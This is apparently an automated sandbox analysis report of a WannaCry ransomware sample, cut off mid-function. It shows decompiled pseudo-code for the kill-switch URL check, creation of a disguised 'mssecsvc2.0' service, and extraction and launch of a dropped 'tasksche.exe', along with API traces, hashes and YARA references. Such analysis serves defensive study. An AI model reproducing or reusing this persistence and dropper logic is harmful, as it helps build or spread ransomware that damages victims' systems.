                • Source File: 00000000.00000002.316305471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.316298685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316335558.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316434150.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316496746.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316707660.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                • API String ID: 3340711343-4063779371
                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                0x0040809f
                0x004080a5
                0x004080ab
                0x004080ae
                0x004080c9
                0x004080cb
                0x004080cd
                0x004080e8
                0x004080ea
                0x004080ec
                0x004080f1
                0x004080fa
                0x004080fa
                0x004080fd
                0x00408100
                0x00408105
                0x0040810e
                0x00408116
                0x0040811e
                0x00408130
                0x004080b0
                0x004080b8
                0x004080b8

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                • __p___argc.MSVCRT ref: 004080A5
                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F59FB10,00000000,?,004081B2), ref: 004080DC
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.316305471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.316298685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316335558.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316434150.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316496746.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316707660.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                • String ID: mssecsvc2.0
                • API String ID: 4274534310-3729025388
                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				int _t9;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
					return _t9;
				} else {
					return E00407F20(_t26);
				}
			}











                0x0040809f
                0x004080a5
                0x004080ab
                0x004080ae
                0x004080c9
                0x004080cb
                0x004080cd
                0x004080e8
                0x004080ea
                0x004080ec
                0x004080f1
                0x004080fa
                0x004080fa
                0x004080fd
                0x00408100
                0x00408105
                0x0040810e
                0x00408116
                0x0040811e
                0x00408126
                0x00408130
                0x004080b0
                0x004080b8
                0x004080b8

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                • __p___argc.MSVCRT ref: 004080A5
                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F59FB10,00000000,?,004081B2), ref: 004080DC
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.575635108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.575630942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575642001.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575645609.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575649727.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575675826.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575680639.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575827739.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                • String ID: mssecsvc2.0
                • API String ID: 4274534310-3729025388
                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                0x00409a19
                0x00409a1b
                0x00409a20
                0x00409a2b
                0x00409a2c
                0x00409a39
                0x00409a3e
                0x00409a43
                0x00409a4a
                0x00409a51
                0x00409a64
                0x00409a72
                0x00409a7b
                0x00409a80
                0x00409a85
                0x00409a8b
                0x00409a92
                0x00409a98
                0x00409a99
                0x00409a9e
                0x00409aa3
                0x00409aa8
                0x00409ab2
                0x00409acb
                0x00409ad1
                0x00409ad6
                0x00409adb
                0x00409ae8
                0x00409aea
                0x00409af0
                0x00409b2c
                0x00409b31
                0x00409b32
                0x00409b32
                0x00409af2
                0x00409af2
                0x00409af2
                0x00409af3
                0x00409af6
                0x00409af8
                0x00409b03
                0x00409b05
                0x00409b05
                0x00409b06
                0x00409b06
                0x00409b03
                0x00409b09
                0x00409b0d
                0x00000000
                0x00000000
                0x00409b13
                0x00409b1a
                0x00409b24
                0x00409b39
                0x00409b26
                0x00409b26
                0x00409b26
                0x00409b3a
                0x00409b3b
                0x00409b3c
                0x00409b44
                0x00409b45
                0x00409b4a
                0x00409b4e
                0x00409b54
                0x00409b59
                0x00409b5b
                0x00409b5e
                0x00409b5f
                0x00409b60
                0x00409b67

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.575635108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.575630942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575642001.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575645609.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575649727.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575675826.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575680639.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575827739.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                • String ID:
                • API String ID: 801014965-0
                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                0x00408155
                0x00408157
                0x00408158
                0x0040815c
                0x00408160
                0x00408164
                0x00408168
                0x0040816c
                0x00408177
                0x0040817b
                0x0040818e
                0x00408194
                0x004081a7
                0x004081ab
                0x004081ad
                0x004081b9

                APIs
                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                Strings
                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                Memory Dump Source
                • Source File: 00000001.00000002.575635108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.575630942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575642001.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575645609.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575649727.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575675826.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575680639.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575827739.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                • API String ID: 774561529-2942426231
                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                0x00407c56
                0x00407c6e
                0x00407c72
                0x00407cd3
                0x00407c74
                0x00407ca7
                0x00407cab
                0x00407cb2
                0x00407cb9
                0x00407cb9
                0x00407cbc
                0x00407cc9
                0x00407cc9

                APIs
                • sprintf.MSVCRT ref: 00407C56
                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F59FB10,00000000), ref: 00407C9B
                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.575635108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.575630942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575642001.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575645609.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575649727.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575675826.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575680639.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575827739.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                • API String ID: 3340711343-4063779371
                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 36%
                			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x0
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x0
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






























                0x00407cf5
                0x00407cfb
                0x00407d15
                0x00407d22
                0x00407d2f
                0x00407d34
                0x00407d36
                0x00407d3c
                0x00407d43
                0x00407d49
                0x00407d4f
                0x00407d55
                0x00407d5b
                0x00407d7a
                0x00407d7e
                0x00407d86
                0x00407d8e
                0x00407d95
                0x00407d9d
                0x00407da1
                0x00407daf
                0x00407db3
                0x00407dc4
                0x00407dc8
                0x00407dca
                0x00407dcc
                0x00407ddb
                0x00407de2
                0x00407def
                0x00407df1
                0x00407e01
                0x00407e18
                0x00407e2c
                0x00407e49
                0x00407e4e
                0x00407e61
                0x00407e68
                0x00407e72
                0x00407e7a
                0x00407e82
                0x00407e8b
                0x00407e95
                0x00407e9b
                0x00407e9f
                0x00407ea8
                0x00407eb0
                0x00407ebb
                0x00407ebc
                0x00407ec6
                0x00407ec7
                0x00407ec8
                0x00407ec9
                0x00407ece
                0x00407ecf
                0x00407ed0
                0x00407ed1
                0x00407ed2
                0x00407ed3
                0x00407edb
                0x00407ee0
                0x00407ef0
                0x00407ef7
                0x00407f02
                0x00407f02
                0x00407ef0
                0x00407e4e
                0x00407db3
                0x00407da1
                0x00407d8e
                0x00407d7e
                0x00407d5b
                0x00407d4f
                0x00407d43
                0x00407f14

                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F59FB10,?,00000000), ref: 00407CEF
                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                • sprintf.MSVCRT ref: 00407E01
                • sprintf.MSVCRT ref: 00407E18
                • MoveFileExA.KERNEL32 ref: 00407E2C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.575635108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.575630942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575642001.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575645609.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575649727.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575675826.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575680639.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000001.00000002.575827739.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                • API String ID: 4072214828-1507730452
                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 75%
                			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
